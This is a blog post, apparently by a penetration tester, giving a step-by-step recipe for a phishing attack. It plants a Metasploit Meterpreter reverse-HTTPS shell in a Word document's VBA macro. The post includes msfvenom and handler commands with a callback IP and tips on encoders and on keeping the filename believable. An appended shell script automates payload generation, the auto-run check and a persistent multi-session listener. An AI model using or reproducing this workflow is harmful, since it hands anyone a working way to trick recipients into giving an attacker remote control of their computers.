Friday 15 August 2014

Metasploit - Meterpreter Inject Visual Basic Meterpreter Shell into Word File

Hi All,

Hope everyone is doing well.  This little post shows how to inject a Meterpreter shell into a Word document.  I decided to write it up because of a pentest I was performing.  I was looking through the website and there was nothing to go on: brute force of the admin page was blocked after 5 invalid attempts, user enumeration was blocked, and there was nothing on haveibeenpwned for the emails gathered.  But there was a registration form for an upcoming event. The form was a Word document that, once completed, had to be emailed to the address given.  This is the perfect phishing target: the client is expecting an email with a Word document attached, so there is initial trust there. This was my attack vector and it worked beautifully.  Here is my little guide.

  1. Open up your command line and execute the following command.

    msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.187.142 LPORT=443 -f vba > vbcode.vba 

    Where LHOST is the IP that the client will connect back to. For this example I did not use any encoders, but it is recommended to do so. My favourite is x86/shikata_ga_nai, which can be added with '-e x86/shikata_ga_nai -i 5', where '-i' is the number of encoding iterations. Keep in mind that the encoder only transforms the shellcode bytes stored inside the macro; the surrounding VBA that allocates memory and runs them is left as-is, so encoding on its own does not hide the macro itself from antivirus.
  2. Copy the exported file to a location you can remember.
  3. Open up the Word document and press 'ALT + F11'.  This opens the Visual Basic editor.
  4. Right-click 'ThisDocument' and click 'Import File...'.

5. If you can't see the file, select 'All Files' in the file type dropdown, as shown.

6. You will now have the module in the Modules list, as shown.  Open the module by double-clicking it.
7. Save the document in 'Word 97-2003' (.doc) format under whatever name you like.  Keeping the original name makes it more believable.  Do not save as .docx: that format cannot hold macros and Word will strip the module on save (.doc and the macro-enabled .docm both keep it).
8. Now go back to the console you will run Metasploit from and execute the command below.
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.187.142 LPORT=443 E 

Where LHOST is the IP that the client will connect back to, i.e. the same value used when generating the macro.

A note on this: you can create the handler in msfconsole if you wish, but msfcli fast-tracks the process. (msfcli has since been removed from Metasploit; in current versions set up the handler in msfconsole, or put the same commands in a resource script and run 'msfconsole -r handler.rc'.)

9. Wait for the user to open the file.....  But I will do it myself as this is a test ;-P.
10. On the client, depending on their macro settings, there will be a security warning as shown. For this to work they need to click 'Enable Content'.  Note this test was run on Word 2013. A document that arrived as an email attachment normally opens in Protected View first, so the target also has to click 'Enable Editing' before the macro warning even appears.
11. Then the Meterpreter session starts.
12. Party time!
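The command-line half of the guide (steps 1 and 8) as one script, added here as an example and not taken from the original post: it generates the macro with msfvenom, checks that the macro actually has an Auto_Open/AutoOpen entry point before it goes anywhere near the document, and starts the handler from a msfconsole resource script instead of msfcli. The payload, LHOST and LPORT are the post's values; the file names, the ExitOnSession setting and the assumption that msfvenom's vba template names its entry point Auto_Open (with an AutoOpen wrapper) are my own.

```shell
#!/bin/sh
# Wraps steps 1 and 8 of the post. Edit LHOST/LPORT to match your listener.
LHOST="192.168.187.142"
LPORT="443"
PAYLOAD="windows/meterpreter/reverse_https"

# Step 1: generate the macro. Encoding is optional and only transforms the
# shellcode bytes stored in the macro, not the macro's own API declarations.
gen_macro() {
    out="$1"
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" \
        -e x86/shikata_ga_nai -i 5 -f vba -o "$out"
}

# Sanity check before importing the module into Word. Assumption: the vba
# template names its entry point Auto_Open and adds an AutoOpen wrapper;
# without one of those the macro never fires when the document is opened.
# Returns 0 when the file looks usable, 1 otherwise.
check_macro() {
    f="$1"
    [ -s "$f" ] || { echo "empty macro file: $f" >&2; return 1; }
    grep -q 'Sub Auto_Open()' "$f" || grep -q 'Sub AutoOpen()' "$f" \
        || { echo "no Auto_Open/AutoOpen entry point in $f" >&2; return 1; }
    return 0
}

# Step 8: write a handler resource script for msfconsole -r. ExitOnSession
# false keeps the handler listening so a second recipient who opens the
# document gets their own session; -j runs the handler as a background job.
write_handler_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# Usage: MSF_RUN=1 sh inject.sh  (msfvenom/msfconsole are only invoked when asked)
if [ "${MSF_RUN:-0}" = "1" ]; then
    gen_macro vbcode.vba && check_macro vbcode.vba || exit 1
    write_handler_rc handler.rc
    msfconsole -q -r handler.rc
fi
```

Run it with MSF_RUN=1 on the attacking box; vbcode.vba is the file you then import into the Word document at step 4, and handler.rc replaces the msfcli one-liner at step 8.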